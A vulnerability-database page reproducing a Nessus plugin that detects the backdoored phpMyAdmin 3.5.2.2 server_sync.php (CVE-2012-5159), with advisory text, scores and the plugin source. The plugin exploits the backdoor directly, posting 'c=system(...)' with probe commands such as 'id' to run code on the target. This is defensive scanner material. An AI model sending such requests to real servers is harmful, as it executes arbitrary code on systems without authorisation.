Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.PHPMYADMIN_PMASA_2012_5.NASL
HistorySep 26, 2012 - 12:00 a.m.

phpMyAdmin server_sync.php Backdoor (PMASA-2012-5)

2012-09-2600:00:00
This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
26

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.911

Percentile

98.9%

JSON

The phpMyAdmin install hosted on the remote web server contains a backdoor script, probably obtained from the cdnetworks-kr-1 SourceForge.net mirror site as part of the file phpMyAdmin-3.5.2.2-all-languages.zip. An unauthenticated, remote attacker can use this backdoor to execute arbitrary PHP code on the remote host, subject to the privileges under which the web server operates.

Note that the bogus distribution file is also reported to have contained a modified version of the file js/cross_framing_protection.js, although Nessus has not tested for that.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(62312);
  script_version("1.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-5159");
  script_bugtraq_id(55672);

  script_name(english:"phpMyAdmin server_sync.php Backdoor (PMASA-2012-5)");

  script_set_attribute(attribute:"synopsis", value:
"A web application hosted on the remote web server has a backdoor.");
  script_set_attribute(attribute:"description", value:
"The phpMyAdmin install hosted on the remote web server contains a
backdoor script, probably obtained from the cdnetworks-kr-1
SourceForge.net mirror site as part of the file
phpMyAdmin-3.5.2.2-all-languages.zip.  An unauthenticated, remote
attacker can use this backdoor to execute arbitrary PHP code on the
remote host, subject to the privileges under which the web server
operates.

Note that the bogus distribution file is also reported to have contained
a modified version of the file js/cross_framing_protection.js, although
Nessus has not tested for that.");
  script_set_attribute(attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2012-5/");
  script_set_attribute(attribute:"solution", value:
"Remove the affected phpMyAdmin install and conduct a full security
review of the web server, as it may have been compromised.  Use only a
trusted mirror to download the application again.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'phpMyAdmin 3.5.2.2 server_sync.php Backdoor');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/09/25");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/09/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/09/26");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("phpMyAdmin_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("www/PHP", "www/phpMyAdmin");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, php:TRUE);

install = get_install_from_kb(
  appname      : "phpMyAdmin",
  port         : port,
  exit_on_fail : TRUE
);
dir = install['dir'];

if (report_paranoia < 2 && (os = get_kb_item('Host/OS')))
{
  if ('Windows' >< os)
    cmds = make_list('ipconfig /all');
  else
    cmds = make_list('id');
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
cmd_pats['ipconfig /all'] = 'Windows IP Configuration';

foreach cmd (cmds)
{
  php = 'system("' + cmd + '");';
  res = http_send_recv3(
    method       : 'POST',
    port         : port,
    item         : dir + "/server_sync.php",
    data         : "c=" + urlencode(str:php),
    content_type : "application/x-www-form-urlencoded",
    exit_on_fail : TRUE
  );

  if (egrep(pattern:cmd_pats[cmd], string:res[2]))
  {
    if (report_verbosity > 0)
    {
      report =
        '\n' + "Nessus was able to execute the command '" + cmd + "' on the remote" +
        '\n' + 'host using the following request :' +
        '\n' +
        '\n' + crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) +
        '\n' + http_last_sent_request() +
        '\n' + crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) + 
        '\n';
      if (report_verbosity > 1)
      {
        report +=
          '\n' + 'This produced the following output :' +
          '\n' +
          '\n' + data_protection::sanitize_uid(output:chomp(res[2])) +
          '\n' +
          '\n';
      }
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "phpMyAdmin", build_url(qs:dir+'/', port:port));

Related

cvelist 1
prion 1
exploitdb 1
metasploit 1
openvas 1
phpmyadmin 1
nvd 1
cve 1
d2 1
seebug 1
debiancve 1
ubuntucve 1
cvelist
cvelist
CVE-2012-5159
2012-09-25 22:00:00
prion
prion
Design/Logic Flaw
2012-09-25 22:55:00
exploitdb
exploitdb
phpMyAdmin 3.5.2.2 - &#039;server_sync.php&#039; Backdoor (Metasploit)
2012-10-10 00:00:00
metasploit
metasploit
phpMyAdmin 3.5.2.2 server_sync.php Backdoor
2012-09-25 15:47:53
openvas
openvas
phpMyAdmin 'server_sync.php' Backdoor Vulnerability
2012-09-26 00:00:00
phpmyadmin
phpmyadmin
One server from the SourceForge.net mirror system was distributing a phpMyAdmin kit containing a backdoor.
2012-09-25 00:00:00
nvd
nvd
CVE-2012-5159
2012-09-25 22:55:00
cve
cve
CVE-2012-5159
2012-09-25 22:55:00
d2
d2
DSquare Exploit Pack: D2SEC_PMA_BACKDOOR
2012-09-25 22:55:00
seebug
seebug
phpMyAdmin 'server_sync.php'θΏœη¨‹εŽι—¨ζΌζ΄ž
2012-09-26 00:00:00
debiancve
debiancve
CVE-2012-5159
2012-09-25 22:55:00
ubuntucve
ubuntucve
CVE-2012-5159
2012-09-25 00:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.911

Percentile

98.9%

JSON
Related for PHPMYADMIN_PMASA_2012_5.NASL
cvelist1prion1exploitdb1metasploit1openvas1phpmyadmin1nvd1cve1d21seebug1debiancve1ubuntucve1